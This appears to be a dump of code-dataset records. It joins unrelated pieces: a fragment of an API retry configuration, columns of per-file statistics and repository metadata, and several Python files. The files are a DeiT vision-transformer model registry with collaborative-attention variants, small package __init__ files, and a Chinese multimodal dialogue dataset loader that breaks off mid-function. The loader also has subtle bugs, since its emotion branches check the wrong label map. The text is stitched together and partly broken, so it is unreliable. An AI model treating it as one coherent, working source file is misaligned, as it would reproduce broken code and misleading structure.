"DeleteIncidentRoleAssignment": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"ListIncidentRoleAssignments": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"CancelIncidentRoleHandover": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
},
}
}
}
| 40.86413
| 67
| 0.419604
| 457
| 7,519
| 6.461707
| 0.142232
| 0.154081
| 0.234677
| 0.249238
| 0.71385
| 0.71385
| 0.71385
| 0.71385
| 0.71385
| 0.71385
| 0
| 0.04815
| 0.475196
| 7,519
| 183
| 68
| 41.087432
| 0.700203
| 0
| 0
| 0.52459
| 0
| 0
| 0.394334
| 0.052002
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
452db20c733b0825950ef1c7a37f9b5e22b73b56
| 73
|
py
|
Python
|
Prediction_Utils/Classification/__init__.py
|
xinyuwang1209/Prediction_Utils
|
a6ff6ec74c8fbdfe4013c760da361ad5b7447651
|
[
"MIT"
] | null | null | null |
Prediction_Utils/Classification/__init__.py
|
xinyuwang1209/Prediction_Utils
|
a6ff6ec74c8fbdfe4013c760da361ad5b7447651
|
[
"MIT"
] | null | null | null |
Prediction_Utils/Classification/__init__.py
|
xinyuwang1209/Prediction_Utils
|
a6ff6ec74c8fbdfe4013c760da361ad5b7447651
|
[
"MIT"
] | null | null | null |
from ._use_lasso import *
from ._use_svc import *
from ._use_rf import *
| 18.25
| 25
| 0.753425
| 12
| 73
| 4.083333
| 0.5
| 0.428571
| 0.530612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.164384
| 73
| 3
| 26
| 24.333333
| 0.803279
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
188677663c76591fa29f6fc7ae4fdfdaeb14cb08
| 11,935
|
py
|
Python
|
models.py
|
jbcdnr/deit-collaborative-attention
|
07905829be28eac1277cbc0255796feeab589bfc
|
[
"Apache-2.0"
] | null | null | null |
models.py
|
jbcdnr/deit-collaborative-attention
|
07905829be28eac1277cbc0255796feeab589bfc
|
[
"Apache-2.0"
] | null | null | null |
models.py
|
jbcdnr/deit-collaborative-attention
|
07905829be28eac1277cbc0255796feeab589bfc
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2015-present, Facebook, Inc.
# All rights reserved.
from mmap import MAP_PRIVATE
import torch
import torch.nn as nn
from functools import partial
import pathlib
from timm.models.vision_transformer import VisionTransformer, _cfg
from timm.models.registry import register_model
import collaborate_attention
@register_model
def deit_tiny_patch16_224(pretrained=False, **kwargs):
model = VisionTransformer(
patch_size=16,
embed_dim=192,
depth=12,
num_heads=3,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
model.default_cfg = _cfg()
if pretrained:
checkpoint = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/deit/deit_tiny_patch16_224-a1311bcf.pth",
map_location="cpu",
check_hash=True,
)
model.load_state_dict(checkpoint["model"])
return model
@register_model
def deit_tiny_colab_patch16_224(pretrained=False, all_key_dim=None, **kwargs):
model = VisionTransformer(
patch_size=16,
embed_dim=192,
depth=12,
num_heads=3,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
model.default_cfg = _cfg()
if pretrained:
checkpoint = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/deit/deit_tiny_patch16_224-a1311bcf.pth",
map_location="cpu",
check_hash=True,
)
model.load_state_dict(checkpoint["model"])
model.cuda()
collaborate_attention.swap(model, all_key_dim)
model.cpu()
return model
@register_model
def deit_small_patch16_224(pretrained=False, **kwargs):
model = VisionTransformer(
patch_size=16,
embed_dim=384,
depth=12,
num_heads=6,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
model.default_cfg = _cfg()
if pretrained:
checkpoint = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/deit/deit_small_patch16_224-cd65a155.pth",
map_location="cpu",
check_hash=True,
)
model.load_state_dict(checkpoint["model"])
return model
@register_model
def deit_base_patch16_224(pretrained=False, **kwargs):
model = VisionTransformer(
patch_size=16,
embed_dim=768,
depth=12,
num_heads=12,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
model.default_cfg = _cfg()
if pretrained:
checkpoint = torch.hub.load_state_dict_from_url(
url="https://dl.fbaipublicfiles.com/deit/deit_base_patch16_224-b5f2ef4d.pth",
map_location="cpu",
check_hash=True,
)
model.load_state_dict(checkpoint["model"])
return model
@register_model
def deit_base_patch16_224_collab384(pretrained=False, **kwargs):
model = VisionTransformer(
patch_size=16,
embed_dim=768,
depth=12,
num_heads=12,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
model.default_cfg = _cfg()
collaborate_attention.swap(model, compressed_key_dim=384, reparametrize=False)
return model
@register_model
def deit_base_patch16_224_collab256(pretrained=False, **kwargs):
model = VisionTransformer(
patch_size=16,
embed_dim=768,
depth=12,
num_heads=12,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
model.default_cfg = _cfg()
collaborate_attention.swap(model, compressed_key_dim=256, reparametrize=False)
return model
@register_model
def deit_base3_patch16_224(pretrained=False, **kwargs):
model = VisionTransformer(
patch_size=16,
embed_dim=768,
depth=3,
num_heads=12,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
model.default_cfg = _cfg()
assert not pretrained
return model
# ========== REDUCED KEY DIMENSION CONCATENATE ATTENTION MODELS ========== #
@register_model
def deit_base3_patch16_224_key384(pretrained=False, **kwargs):
import timm.models.vision_transformer
from collaborate_attention import FlexibleKeyDimensionAttention
timm.models.vision_transformer.Attention = partial(FlexibleKeyDimensionAttention, all_key_dim=384)
model = VisionTransformer(
patch_size=16,
embed_dim=768,
depth=3,
num_heads=12,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
model.default_cfg = _cfg()
assert not pretrained
return model
@register_model
def deit_base3_patch16_224_key192(pretrained=False, **kwargs):
import timm.models.vision_transformer
from collaborate_attention import FlexibleKeyDimensionAttention
timm.models.vision_transformer.Attention = partial(FlexibleKeyDimensionAttention, all_key_dim=192)
model = VisionTransformer(
patch_size=16,
embed_dim=768,
depth=3,
num_heads=12,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
model.default_cfg = _cfg()
assert not pretrained
return model
@register_model
def deit_base3_patch16_224_key96(pretrained=False, **kwargs):
import timm.models.vision_transformer
from collaborate_attention import FlexibleKeyDimensionAttention
timm.models.vision_transformer.Attention = partial(FlexibleKeyDimensionAttention, all_key_dim=96)
model = VisionTransformer(
patch_size=16,
embed_dim=768,
depth=3,
num_heads=12,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
model.default_cfg = _cfg()
assert not pretrained
return model
# ========== COLLABORATIVE ATTENTION MODELS ========== #
# ========== BASE 3 LAYERS ========== #
@register_model
def deit_base3_patch16_224_collab384(pretrained=False, models_directory=None, **kwargs):
model = VisionTransformer(
patch_size=16,
embed_dim=768,
depth=3,
num_heads=12,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
collaborate_attention.swap(model, compressed_key_dim=384, reparametrize=False)
model.default_cfg = _cfg()
if pretrained:
checkpoint_path = pathlib.Path(models_directory) / "deit_base3_patch16_224_collab384.pth"
print(f"Load model from '{checkpoint_path}'")
checkpoint = torch.load(checkpoint_path, map_location="cpu")
model.load_state_dict(checkpoint["model"])
return model
@register_model
def deit_base3_patch16_224_collab192(pretrained=False, models_directory=None, **kwargs):
model = VisionTransformer(
patch_size=16,
embed_dim=768,
depth=3,
num_heads=12,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
collaborate_attention.swap(model, compressed_key_dim=192, reparametrize=False)
model.default_cfg = _cfg()
if pretrained:
checkpoint_path = pathlib.Path(models_directory) / "deit_base3_patch16_224_collab192.pth"
print(f"Load model from '{checkpoint_path}'")
checkpoint = torch.load(checkpoint_path, map_location="cpu")
model.load_state_dict(checkpoint["model"])
return model
@register_model
def deit_base3_patch16_224_collab96(pretrained=False, models_directory=None, **kwargs):
model = VisionTransformer(
patch_size=16,
embed_dim=768,
depth=3,
num_heads=12,
mlp_ratio=4,
qkv_bias=True,
norm_layer=partial(nn.LayerNorm, eps=1e-6),
**kwargs,
)
collaborate_attention.swap(model, compressed_key_dim=96, reparametrize=False)
model.default_cfg = _cfg()
if pretrained:
checkpoint_path = pathlib.Path(models_directory) / "deit_base3_patch16_224_collab96.pth"
print(f"Load model from '{checkpoint_path}'")
checkpoint = torch.load(checkpoint_path, map_location="cpu")
model.load_state_dict(checkpoint["model"])
return model
# ========== BASE ========== #
@register_model
def deit_base_patch16_224_collab64(pretrained=False, models_directory="./models", **kwargs):
model = deit_base_patch16_224(pretrained=False)
collaborate_attention.swap(model, compressed_key_dim=64, reparametrize=False)
if pretrained:
checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab64.pth"
print(f"Load model from '{checkpoint_path}'")
checkpoint = torch.load(checkpoint_path, map_location="cpu")
model.load_state_dict(checkpoint["model"])
return model
@register_model
def deit_base_patch16_224_collab128(pretrained=False, models_directory="./models", **kwargs):
model = deit_base_patch16_224(pretrained=False)
collaborate_attention.swap(model, compressed_key_dim=128, reparametrize=False)
if pretrained:
checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab128.pth"
print(f"Load model from '{checkpoint_path}'")
checkpoint = torch.load(checkpoint_path, map_location="cpu")
model.load_state_dict(checkpoint["model"])
return model
@register_model
def deit_base_patch16_224_collab256(pretrained=False, models_directory="./models", **kwargs):
model = deit_base_patch16_224(pretrained=False)
collaborate_attention.swap(model, compressed_key_dim=256, reparametrize=False)
if pretrained:
checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab256.pth"
print(f"Load model from '{checkpoint_path}'")
checkpoint = torch.load(checkpoint_path, map_location="cpu")
model.load_state_dict(checkpoint["model"])
return model
@register_model
def deit_base_patch16_224_collab384(pretrained=False, models_directory="./models", **kwargs):
model = deit_base_patch16_224(pretrained=False)
collaborate_attention.swap(model, compressed_key_dim=384, reparametrize=False)
if pretrained:
checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab384.pth"
print(f"Load model from '{checkpoint_path}'")
checkpoint = torch.load(checkpoint_path, map_location="cpu")
model.load_state_dict(checkpoint["model"])
return model
@register_model
def deit_base_patch16_224_collab512(pretrained=False, models_directory="./models", **kwargs):
model = deit_base_patch16_224(pretrained=False)
collaborate_attention.swap(model, compressed_key_dim=512, reparametrize=False)
if pretrained:
checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab512.pth"
print(f"Load model from '{checkpoint_path}'")
checkpoint = torch.load(checkpoint_path, map_location="cpu")
model.load_state_dict(checkpoint["model"])
return model
@register_model
def deit_base_patch16_224_collab768(pretrained=False, models_directory="./models", **kwargs):
model = deit_base_patch16_224(pretrained=False)
collaborate_attention.swap(model, compressed_key_dim=768, reparametrize=False)
if pretrained:
checkpoint_path = pathlib.Path(models_directory) / "deit_base_patch16_224_collab768.pth"
print(f"Load model from '{checkpoint_path}'")
checkpoint = torch.load(checkpoint_path, map_location="cpu")
model.load_state_dict(checkpoint["model"])
return model
| 32.432065
| 102
| 0.685966
| 1,437
| 11,935
| 5.402923
| 0.085595
| 0.048944
| 0.042504
| 0.051005
| 0.928387
| 0.910227
| 0.906234
| 0.89168
| 0.89168
| 0.886528
| 0
| 0.049825
| 0.209636
| 11,935
| 367
| 103
| 32.520436
| 0.773243
| 0.021366
| 0
| 0.780255
| 0
| 0
| 0.091197
| 0.027085
| 0
| 0
| 0
| 0
| 0.012739
| 1
| 0.06051
| false
| 0
| 0.044586
| 0
| 0.165605
| 0.028662
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a0aea4fbfd72ec9a93f66e9e4c50718760b2334
| 541
|
py
|
Python
|
schema_registry/serializers/__init__.py
|
abiodunjames/python-schema-registry-client
|
a8fb9e2aca0bf827b71b6ac31ac7cef76ff2059b
|
[
"MIT"
] | 95
|
2019-05-20T06:59:06.000Z
|
2022-03-01T05:30:57.000Z
|
schema_registry/serializers/__init__.py
|
abiodunjames/python-schema-registry-client
|
a8fb9e2aca0bf827b71b6ac31ac7cef76ff2059b
|
[
"MIT"
] | 94
|
2019-05-19T18:36:29.000Z
|
2022-03-30T18:54:52.000Z
|
schema_registry/serializers/__init__.py
|
abiodunjames/python-schema-registry-client
|
a8fb9e2aca0bf827b71b6ac31ac7cef76ff2059b
|
[
"MIT"
] | 41
|
2019-05-20T06:59:33.000Z
|
2022-03-06T16:09:53.000Z
|
from schema_registry.serializers.message_serializer import AvroMessageSerializer # noqa
from schema_registry.serializers.message_serializer import JsonMessageSerializer # noqa
from schema_registry.serializers.message_serializer import MessageSerializer # noqa
from schema_registry.serializers.message_serializer import AsyncAvroMessageSerializer # noqa
from schema_registry.serializers.message_serializer import AsyncJsonMessageSerializer # noqa
from schema_registry.serializers.message_serializer import AsyncMessageSerializer # noqa
| 77.285714
| 93
| 0.889094
| 54
| 541
| 8.685185
| 0.259259
| 0.127932
| 0.230277
| 0.371002
| 0.707889
| 0.707889
| 0.707889
| 0.597015
| 0
| 0
| 0
| 0
| 0.077634
| 541
| 6
| 94
| 90.166667
| 0.93988
| 0.053604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7a0fb53d5956d7bbeb30711e8cb03936eb1d4fc6
| 97,601
|
py
|
Python
|
utils/util.py
|
scut-bds/exampe_repo_from_scutbds
|
6528eeb25d6da53dd4f7eb6b92d534631794aa80
|
[
"Apache-2.0"
] | null | null | null |
utils/util.py
|
scut-bds/exampe_repo_from_scutbds
|
6528eeb25d6da53dd4f7eb6b92d534631794aa80
|
[
"Apache-2.0"
] | null | null | null |
utils/util.py
|
scut-bds/exampe_repo_from_scutbds
|
6528eeb25d6da53dd4f7eb6b92d534631794aa80
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 South China University of Technology and
# Engineering Research Ceter of Minstry of Education on Human Body Perception.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# File: util.py
# Used for dataset loading
# Author: Chen Yirong <eeyirongchen@mail.scut.edu.cn>
# Date: 2021.08.30
import os
import re
import math
import json
import torch
import shutil
import collections
import pandas as pd
from os.path import join
from chardet import detect
from itertools import chain
from torch.utils.data import Dataset
from torch.nn.utils.rnn import pad_sequence
from torch.utils.data import DataLoader
# reference: [CDial-GPT/od/](https://github.com/thu-coai/CDial-GPT)
SPECIAL_TOKENS = ["[CLS]", "[SEP]", "[speaker1]", "[speaker2]"]
MODEL_INPUTS = ["input_ids", "lm_labels", "token_type_ids"]
# input_ids: [CLS] [speaker1] 妈 [speaker2] 你 不 要 叫 我 妈 [speaker2] 我 不 是 你 妈 [SEP]
# token_type_ids: [CLS] [DA1 ] Emo1] [DA2 ] [Emo2 ] [DA3 ] [Emo3 ]
# positioning_embedding: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
# input_ids: [CLS] [speaker1] 妈 [speaker2] 你 不 要 叫 我 妈 [speaker2] 我 不 是 你 妈 [SEP]
# token_type_ids: [CLS] [speaker1] [speaker1] [speaker2] [speaker1 ] [speaker2] [speaker2 ] [speaker2]
# Emotion_embedding: [CLS] [Emo1 ] [Emo2 ] [Emo3 ]
# DA_embedding: [CLS] [DA1 ] [DA2 ] [DA3 ]
# positioning_embedding: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
# dialogue_text data_dir: /home/MMMTD/dialogue_text
# dialogue_video data_dir: /home/MMMTD/dialogue_video
# dialogue_audio data_dir: /home/MMMTD/dialogue_audio
DA_TOKENS = ["[greeting]","[question]","[answer]","[statement-opinion]","[statement-non-opinion]","[apology]",
"[command]","[agreement]","[disagreement]","[acknowledge]","[appreciation]","[interjection]",
"[conventional-closing]","[quotation]","[reject]","[irony]","[comfort]","[thanking]","[da-other]"] # 19 DA labels
SENTIMENT_TOKENS = ["[neutral]","[positive]","[negative]"]
EMOTION_TOKENS = ["[happy]","[grateful]","[relaxed]","[positive-other]","[anger]","[sadness]","[fear]",
"[depress]","[disgust]","[astonished]","[worried]","[negative-other]","[neutral]"] # 13 emotion labels
BASEEMOTION_TOKENS = ["[happy]"]
DA_TO_TOKENS = {'greeting': '[greeting]', 'question': '[question]', 'answer': '[answer]',
'statement-opinion': '[statement-opinion]', 'statement-non-opinion': '[statement-non-opinion]',
'apology': '[apology]', 'command': '[command]', 'agreement': '[agreement]',
'disagreement': '[disagreement]', 'acknowledge': '[acknowledge]', 'appreciation': '[appreciation]',
'interjection': '[interjection]', 'conventional-closing': '[conventional-closing]',
'quotation': '[quotation]', 'reject': '[reject]', 'irony': '[irony]',
'comfort': '[comfort]','thanking':'[thanking]', 'other': '[da-other]'}
SENTIMENT_TO_TOKENS = {'neutral': '[neutral]', 'positive': '[positive]', 'negative': '[negative]'}
EMOTION_TO_TOKENS = {'happy': '[happy]', 'grateful': '[grateful]', 'relaxed': '[relaxed]',
'positive-other': '[positive-other]', 'anger': '[anger]', 'sadness': '[sadness]',
'fear': '[fear]', 'depress': '[depress]', 'disgust': '[disgust]',
'astonished': '[astonished]', 'worried': '[worried]', 'negative-other': '[negative-other]',
'neutral': '[neutral]'}
BASEEMOTION_TO_TOKENS = {"happy":'[happy]'}
AGEGROUP_TO_TOKENS = {"young":"young","middle-aged":"middle-aged","elderly":"elderly","teenager":"teenager","children":"children","unknown":"unknown"}
# for BERT ERC and DAC
DA_TO_ID = {'greeting': 0, 'question': 1, 'answer': 2, 'statement-opinion': 3, 'statement-non-opinion': 4,
'apology': 5, 'command': 6, 'agreement': 7, 'disagreement': 8, 'acknowledge': 9, 'appreciation': 10,
'interjection': 11, 'conventional-closing': 12, 'quotation': 13, 'reject': 14, 'irony': 15,
'comfort': 16,'thanking':17, 'other': 18}
EMOTION_TO_ID = {'happy': 0, 'grateful': 1, 'relaxed': 2, 'positive-other': 3, 'anger': 4, 'sadness': 5,
'fear': 6, 'depress': 7, 'disgust': 8, 'astonished': 9, 'worried': 10,
'negative-other': 11, 'neutral': 12}
GENDER_TO_ID = {'female': 0, 'unknown': 1, 'male': 2}
BIGFIVE_TO_ID = {'low': 0, 'unknown': 1, 'high': 2}
def get_data(args, tokenizer, data_path, logger):
'''get_data
Get .csv format dataset from data_path.
'''
logger.info("Read dataset from %s", data_path)
data = pd.read_csv(data_path,
usecols=["Dialogue_ID","Utterance_ID","Speaker","Sentiment","Emotion","DA","Utterance","Gender","Age","Neuroticism","Extraversion","Openness","Agreeableness","Conscientiousness"],
encoding="UTF-8-SIG")
# 有待增加一列base情感,利用"Emotion"列转换
def createbaseemotion(emotion):
new_emotion = emotion
return new_emotion
# data["BaseEmotion"] = [createbaseemotion(s) for s in data["Emotion"]]
samples = data.iloc[0:30]
logger.info("Start tokenizing and encoding the dataset")
def tokenize(utterance):
utterance = str(utterance) # 保证为str类型
# 对于问句添加问号
utterance = utterance.replace("吗", "吗?")
utterance = utterance.replace("??", "?")
# 对于感叹句添加感叹号
utterance = utterance.replace("啊", "啊!")
utterance = utterance.replace("吧", "吧!")
utterance = utterance.replace("啦", "啦!")
utterance = utterance.replace("呀", "呀!")
utterance = utterance.replace("!!", "!")
# 对于句子中间非问句,非感叹句添加逗号
utterance = utterance.replace(" ", ",")
# 去除重复标点符号
utterance = utterance.split() # 去除全部空格
utt_list = list(utterance) # "季杨杨,好像我听凡凡说过" --> ['季', '杨', '杨', ',', '好', '像', '我', '听', '凡', '凡', '说', '过']
utterance = ' '.join(utt_list) # ['季', '杨', '杨', ',', '好', '像', '我', '听', '凡', '凡', '说', '过']--> “季 杨 杨 , 好 像 我 听 凡 凡 说 过” # <class 'str'>
return tokenizer.convert_tokens_to_ids(tokenizer.tokenize(utterance))
data["Token"] = [tokenize(s) for s in data["Utterance"]]
logger.info("Finished tokenizing and encoding the dataset")
return data, samples
def convert_EMOTION_TO_TOKENS(emotion_list,emotion_type):
emotion_tokens_list = []
if emotion_type=="Sentiment": # "Sentiment"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[UNK]")
else:
emotion_tokens_list.append(SENTIMENT_TO_TOKENS[emo])
elif emotion_type=="BaseEmotion": # "BaseEmotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[UNK]")
else:
emotion_tokens_list.append(BASEEMOTION_TO_TOKENS[emo])
else: # "Emotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[UNK]")
else:
emotion_tokens_list.append(EMOTION_TO_TOKENS[emo])
return emotion_tokens_list
def convert_DA_TO_TOKENS(da_list):
da_tokens_list = []
for da in da_list:
da_tokens_list.append(DA_TO_TOKENS[da])
return da_tokens_list
def create_speaker(speaker_list):
speaker1 = speaker_list[0]
new_speaker_list = []
for speaker in speaker_list:
if speaker==speaker1:
new_speaker_list.append("[speaker1]")
else:
new_speaker_list.append("[speaker2]")
return new_speaker_list
def set_da_in_speaker(da_ids,input_ids,bos, eos, pad, speaker1, speaker2):
special_token_ids_list = [bos, eos, speaker1, speaker2]
new_da_ids = []
for i,da in enumerate(da_ids):
if input_ids[i] in special_token_ids_list:
new_da_ids.append(da_ids[i])
else:
new_da_ids.append(pad)
return new_da_ids
def set_emotion_in_speaker(emotion_ids,input_ids,bos, eos, pad, speaker1, speaker2):
special_token_ids_list = [bos, eos, speaker1, speaker2]
new_emotion_ids = []
for i,emotion in enumerate(emotion_ids):
if input_ids[i] in special_token_ids_list:
new_emotion_ids.append(emotion_ids[i])
else:
new_emotion_ids.append(pad)
return new_emotion_ids
class MMMTDDataset(Dataset):
'''
word_tokens: [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
emotion_list: [[neutral], [neutral], [neutral]]
da_list: [[greeting], [greeting], [greeting]]
input_ids: [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
if with_emotion==True:
token_type_ids: [ 0, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102] # "[neutral]": 13102
elif with_da==True:
token_type_ids: [ 0, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088] # "[greeting]": 13088
else:
token_type_ids: [ 0, 13086, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
labels:
'''
def __init__(self,
data,
tokenizer,
emotion_type="Sentiment",
max_history=15,
batch_first=True,
lm_labels=True,
with_emotion=False,
with_da=False):
self.data = data
self.tokenizer = tokenizer
self.emotion_type = emotion_type # "Sentiment" or "BaseEmotion" or "Emotion"
self.da_size = 18 # Number of DA categories
self.emotion_size = 3 # Number of emotion categories
self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
self.with_da=with_da # # Whether use DA to help generate dialogue
if self.emotion_type=="Sentiment":
self.emotion_size = 3
elif self.emotion_type=="BaseEmotion":
self.emotion_size = 7
else: # self.emotion_type==2
self.emotion_size = 15
self.max_history = max_history # Maximum number of dialogue sentences
self.pad = tokenizer.pad_token_id
self.batch_first = batch_first
self.lm_labels = lm_labels
self.keys = list(set(self.data['Dialogue_ID']))
self.len = len(self.keys)
def __len__(self):
return self.len
def __getitem__(self, index):
dialogue_id = self.keys[index]
data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
if self.lm_labels: # for train and valid dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
response = data_index["Token"].tolist()[-1]
else: # for test dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
response = []
return self.process(speaker_list, utterance_history, emotion_list, da_list, response)
def create_speaker(self,speaker_list):
speaker1 = speaker_list[0]
new_speaker_list = []
for speaker in speaker_list:
if speaker==speaker1:
new_speaker_list.append("[speaker1]")
else:
new_speaker_list.append("[speaker2]")
return new_speaker_list
def convert_EMOTION_TO_TOKENS(self,emotion_list):
emotion_tokens_list = []
if self.emotion_type=="Sentiment": # "Sentiment"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[UNK]")
else:
emotion_tokens_list.append(SENTIMENT_TO_TOKENS[emo])
elif self.emotion_type=="BaseEmotion": # "BaseEmotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[UNK]")
else:
emotion_tokens_list.append(BASEEMOTION_TO_TOKENS[emo])
else: # "Emotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[UNK]")
else:
emotion_tokens_list.append(EMOTION_TO_TOKENS[emo])
return emotion_tokens_list
def convert_DA_TO_TOKENS(self,da_list):
da_tokens_list = []
for da in da_list:
da_tokens_list.append(DA_TO_TOKENS[da])
return da_tokens_list
def process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.with_da:
instance["token_da_ids"] = [bos] + [da_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_emotion:
instance["token_emotion_ids"] = [bos] + [emotion_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def testdata_process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.with_da:
instance["token_da_ids"] = [bos] + [da_list[i] for i, s in
